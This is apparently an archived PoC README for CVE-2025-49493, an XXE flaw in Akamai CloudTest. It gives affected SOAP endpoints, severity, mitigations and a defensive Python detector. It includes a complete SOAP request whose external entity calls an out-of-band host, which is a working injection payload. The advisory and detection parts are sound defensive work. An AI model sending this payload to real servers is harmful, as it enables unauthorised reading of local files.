Associated vulnerability
Description
CVE-2025-49493
Introduction
# CVE-2025-49493 Akamai CloudTest - XXE Injection ☁️
## 📄 Description:
Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
---
## 🛠️ Basic Information:
* **Affected Product**: Akamai CloudTest (prior to version 60 — build 12988, released June 2025)
* **Vulnerability Type**: XML External Entity Injection (XXE)
* **CWE**: CWE-611 – Improper Restriction of XML External Entity Reference
* **Impact**: Remote attackers can send crafted XML to read local files on the server without authentication or user interaction.
---
## 🔍 Technical Details:
* Vulnerable SOAP endpoints include:
```
/concerto/services/RepositoryService
/concerto/services/CollectorService
/concerto/services/Concerto
/concerto/services/SampleService
```
```
POST //concerto/services/RepositoryService HTTP/1.1
Host: redacted.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (******; **** *** ** X 10_15_7) **********/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 *****/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 610

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://b6it5hei11vmt9as2lbg98h4gvmrahy6.oastify.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>
```

* The flaw allows attackers to inject external DTDs (Document Type Definitions) and exploit XML parsers to leak local file content.
* Techniques such as error-based parsing and out-of-band (OOB) data exfiltration can be used.
---
## 📊 Severity:
* **CVSS v3.1 Score**: 5.8 (Medium 🟠)
* **Attack Vector**: Network
* **Privileges Required**: None
* **User Interaction**: None
* **Impact**: Confidentiality breach (e.g., reading `/etc/passwd`)
---
## ✅ Mitigation Steps:
1. **Update to CloudTest version 60 or later**, where external entity parsing is disabled by default.
2. **Disable DTD processing** in XML parsers manually if an upgrade isn't possible.
3. **Restrict network access** to CloudTest instances (e.g., via firewalls and IP allowlists).
4. **Monitor XML traffic** for anomalies or known exploit patterns.
5. **Limit file access permissions** for the CloudTest service to reduce impact.
6. **Deploy a WAF (Web Application Firewall)** with rules against XXE attacks.
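As an added example (not part of this advisory, the PoC, or Akamai's code), the following Python shows mitigations 2 and 4 applied to an envelope shaped like the request above: `audit_dtd` records any DOCTYPE and external entity declaration while refusing to fetch anything, and `parse_soap_strict` rejects a request the moment a DOCTYPE appears. Both sample envelopes are constructed, and the out-of-band host is a placeholder.

```python
import xml.parsers.expat as expat

# Constructed sample bodies (not the advisory's PoC); the OOB host is a placeholder.
XXE_ENVELOPE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://oob-placeholder.invalid/">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body><rep:getUIBundleObjectXml xmlns:rep="http://example.com/services/repository">
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml></rep:getUIBundleObjectXml>
</soapenv:Body></soapenv:Envelope>"""
CLEAN_ENVELOPE = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>"""

class DtdRejected(ValueError):
    """Raised when a SOAP request body declares a DTD."""

def audit_dtd(body: bytes) -> dict:
    """Monitoring hook (mitigation 4): report DTD usage without resolving anything.
    External entity references are refused; returning 0 makes expat abort there."""
    f = {"doctype": None, "external_entities": [], "blocked_refs": [], "error": None}
    def on_doctype(name, sysid, pubid, has_internal_subset):
        f["doctype"] = name
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:  # external, not an inline value
            f["external_entities"].append((name, sysid))
    def on_external_ref(context, base, sysid, pubid):
        f["blocked_refs"].append(sysid)
        return 0  # never fetch; expat reports an error instead
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_external_ref
    try:
        p.Parse(body, True)
    except expat.ExpatError as e:
        f["error"] = str(e)
    return f

def parse_soap_strict(body: bytes) -> str:
    """Hardened parse (mitigation 2): reject any DOCTYPE; return the root element name."""
    names = []
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE '{name}' is not allowed in a SOAP request")
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = on_doctype
    p.StartElementHandler = lambda name, attrs: names.append(name)
    p.Parse(body, True)
    return names[0]
```

A SOAP envelope never legitimately needs a DTD, so rejecting every DOCTYPE is a safe rule for the `/concerto/services/*` endpoints listed above, and the audit output gives a WAF or log pipeline a concrete field to alert on.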
---
## 📅 Timeline:
* Vulnerability discovered: June 2025
* Fix released: Early July 2025
* Proof of Concept (PoC) exists publicly.
* No confirmed mass exploitation as of now.
---
### ✅ Summary Table:
| Field | Details |
| ---------------- | ----------------------------------- |
| Product | Akamai CloudTest < v60 |
| CVSS Score | 5.8 (Medium) |
| Exploitable | Remotely, no auth required |
| Affected Feature | XML SOAP services |
| Attack Technique | XXE via external DTDs |
| Patch | Available in version 60 (June 2025) |
| Risk | Disclosure of sensitive files |
---
## ⚠️ Disclaimer:
This PoC is provided for educational and research purposes only. Running this on any system without permission is illegal and unethical!!!
File snapshot
[4.0K] /data/pocs/309fbb9cfcd045024458d5e66ab19b6a15e2c867
└── [4.0K] README.md
0 directories, 1 file
Notes
1. Accessing the original source is recommended in the first instance.
2. If the source is no longer available or cannot be accessed, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.